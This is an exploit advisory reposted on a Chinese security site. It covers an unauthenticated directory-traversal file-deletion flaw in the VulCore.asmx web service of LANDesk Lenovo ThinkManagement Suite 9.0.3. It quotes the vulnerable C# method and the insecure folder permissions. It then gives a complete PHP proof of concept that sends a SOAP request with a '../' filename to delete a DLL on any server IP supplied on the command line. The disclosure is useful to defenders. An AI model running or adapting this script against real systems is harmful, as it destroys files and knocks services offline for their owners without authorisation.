首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server Remote Arbitrary File Del
来源:vfocus.net 作者:rgod 发布时间:2012-03-20  
LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server WSVulnerabilityCore.dll
SetTaskLogByFile() Remote Arbitrary File Deletion Vulnerability
Tested against: Microsoft Windows Server 2003 r2 sp2
Software home page: http://www.landesk.com/lenovo/thinkmanagement-console.aspx
Download url: http://www.landesk.com/downloads/lenovo/50.aspx
Files tested:
ThinkManagement9.0.2.exe
LD90-SP2-MCP_CONS-2011-0428.exe
LD90-SP2-MCP_SD-2011-0428.exe
ThinkManagementConsole9.0.3_b28.zip
Instrunctions were to install 9.0.2, then apply two patches, finally to install 9.0.3
Background:
The mentioned product creates various virtual directories on IIS.
Among them the 'WSVulnerabilityCore' one.
Without prior authentication / authorization is possible to
invoke the 'VulCore.asmx' web service which exposes various
functions inside the underlying dlls.
Vulnerability:
By specifying the 'SetTaskLogByFile' operation is possible to
delete arbitrary files on the target operating system.
Vulnerable code:
VulCore.asmx:
...
<%@ WebService Language="c#" Codebehind="VulCore.asmx.cs" Class="LANDesk.ManagementSuite.WSVulnerabilityCore.VulCore" %>
...
SetTaskLogByFile() from the VulCore class of WSVulnerabilityCore.dll:
...
[WebMethod]
public void SetTaskLogByFile(int computerIdn, int taskid, string filename)
{
    try
    {
        string fullPath = GlobalBiz.LDLogon + @"VulScanResults\" + filename;
        byte[] fileContents = GlobalBiz.GetFileContents(fullPath);
        File.Delete(fullPath); //<------------------------ !!!
        if (filename.EndsWith("z"))
        {
            fileContents = GlobalBiz.DecompressBytes(fileContents);
        }
        this.SetTaskLog(computerIdn, taskid, Encoding.UTF8.GetString(fileContents));
    }
    catch (Exception exception)
    {
        RollingLog.Log(exception.ToString(), new object[0]);
    }
}
...
The 'filename' argument is used to delete files and suffers of a directory traversal vulnerability,
no checks of any kind.
To the ManagementSuite folder were given unsecure permission, see, from the command line:
C:\>cacls "C:\Program Files\LANDesk\ManagementSuite\"
C:\Program Files\LANDesk\ManagementSuite SERVER\LANDesk Management Suite:R
                                         SERVER\LANDesk Management Suite:(OI)(CI)(IO)(special access:)                                                                                      GENERIC_READ
                                                                                     GENERIC_EXECUTE
                                         SERVER\LANDesk Script Writers:R
                                         SERVER\LANDesk Script Writers:(OI)(CI)(IO)(special access:)                                                                                    GENERIC_READ
                                                                                   GENERIC_EXECUTE
                                         SERVER\LANDesk Administrators:(OI)(CI)F
                                         BUILTIN\Administrators:(OI)(CI)F
                                         NT AUTHORITY\SYSTEM:(OI)(CI)F
                                         NT AUTHORITY\NETWORK SERVICE:(OI)(CI)F
                                         SERVER\ASPNET:(OI)(CI)F  <--------------------------------- !!!
                                         SERVER\IWAM_SERVER:R
                                         SERVER\IWAM_SERVER:(OI)(CI)(IO)(special access:)                                                                         GENERIC_READ
                                                                        GENERIC_EXECUTE
                                         SERVER\IUSR_SERVER:R
                                         SERVER\IUSR_SERVER:(OI)(CI)(IO)(special access:)                                                                         GENERIC_READ
                                                                        GENERIC_EXECUTE
                                         NT AUTHORITY\Authenticated Users:R
                                         NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(special access:)                                                                                       GENERIC_READ
                                                                                      GENERIC_EXECUTE
Full privileges were given to the subfolders and files to the ASPNET user.
So a remote attacker can effectively deny service by deleting dlls, archives and configuration files
including ex. web.config files.
Remote code execution could be possible but has not been proofed at the time of this article.
As attachment, a proof of concept code which delete a LANDesk dll from remote.
POC:
<?php
/*
LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server WSVulnerabilityCore.dll
SetTaskLogByFile() Remote Arbitrary File Deletion Vulnerability PoC
*/
    error_reporting(E_ALL ^ E_NOTICE);
    set_time_limit(0);
 $err[0] = "[!] This script is intended to be launched from the cli!";
    $err[1] = "[!] You need the curl extesion loaded!";
    if (php_sapi_name() <> "cli") {
        die($err[0]);
    }
 function syntax() {
       print("usage: php 9sg_landeskii.php [ip_address]\r\n" );
       die();
    }
 $argv[1] ? print("[*] Attacking...\n") :
    syntax();
 if (!extension_loaded('curl')) {
        $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true :
        false;
        if ($win) {
            !dl("php_curl.dll") ? die($err[1]) :
             print("[*] curl loaded\n");
        } else {
            !dl("php_curl.so") ? die($err[1]) :
             print("[*] curl loaded\n");
        }
    }
    function _s($url, $is_post, $ck, $request) {
        global $_use_proxy, $proxy_host, $proxy_port;
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        if ($is_post) {
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $request);
        }
        curl_setopt($ch, CURLOPT_HEADER, 1);
        curl_setopt($ch, CURLOPT_HTTPHEADER, array(
            "Cookie: ".$ck ,
            "Content-Type: text/xml; charset=utf-8",
            "SOAPAction: \"http://tempuri.org/SetTaskLogByFile\""
        ));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_USERAGENT, "");
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_TIMEOUT, 0);
        if ($_use_proxy) {
            curl_setopt($ch, CURLOPT_PROXY, $proxy_host.":".$proxy_port);
        }
        $_d = curl_exec($ch);
        if (curl_errno($ch)) {
            //die("[!] ".curl_error($ch)."\n");
        } else {
            curl_close($ch);
        }
        return $_d;
    }
          $host = $argv[1];
          $port = 80;
$soap='<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <SetTaskLogByFile xmlns="http://tempuri.org/">
      <computerIdn>1</computerIdn>
      <taskid>1</taskid>
      <filename>../ygrep32.dll</filename>
    </SetTaskLogByFile>
  </soap:Body>
</soap:Envelope>';
$url = "http://$host:$port/WSVulnerabilityCore/VulCore.asmx";
$out = _s($url, 1, "", $soap);
print($out."\n");
?>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·LANDesk Lenovo ThinkManagement
·2X Client for RDP 10.1.1204 Cl
·Dell Webcam Software Bundled A
·2X ApplicationServer 10.1 TuxS
·Joomla 2.5.0-2.5.1 Time Based
·VLC v. 2.0.1.0 .tta Memory Cor
·Zinf Audio Player (m3u file) B
·VLC v. 2.0.1.0 .jls DOS
·TypesoftFTP Server 1.1 Remote
·VLC v. 2.0.1.0 .voc Memory Cor
·RM Downloader Version 3.1.3.3.
·Telnet-Ftp Server <=v1.218 Rem
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved